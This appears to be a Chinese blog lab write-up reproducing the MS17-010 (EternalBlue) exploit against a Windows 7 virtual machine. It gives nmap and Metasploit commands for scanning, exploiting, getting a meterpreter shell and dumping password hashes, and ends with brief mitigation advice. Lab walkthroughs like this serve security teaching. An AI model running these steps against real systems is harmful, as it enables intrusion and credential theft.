MS17-010漏洞复现

1、准备工作

靶机:win7(ip:192.168.61.132)

攻击机:kail2023(ip:192.168.61.131)

工具:nmap、msfconsole

注意:需要关闭win7的防火墙nmap扫描到445端口

2、漏洞复现

首先保证两台主机可以ping通

(ctrl+z可以提前结束进程 否则会一直输出)

接下来使用nmap去扫描端口

nmap 192.168.61.132

 检测到445端口可能存在永恒之蓝漏洞

打开msfconsole

查询ms17-010模块

search ms17-010

加载扫描模块1并查看配置(auxiliary为辅助模块)

use 1

show options

发现rhost未配置主机,配置目标主机

set rhosts 192.168.61.132

继续使用永恒之蓝攻击模块(模块2)

use 2

并设置攻击载荷

set payload

设置rhosts

使用exploit开始攻击

成功运行会产生meterpreter字样

使用screenshot获取靶机当前页面照片

根据路径找到照片

查看权限:getuid

拿到shell

使用hashdump并且使用MD5解码即可知道用户密码

还很多方法就不一一罗列了

解决方法

 关闭445端口

 打开防火墙,安装市面上的一些杀软

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值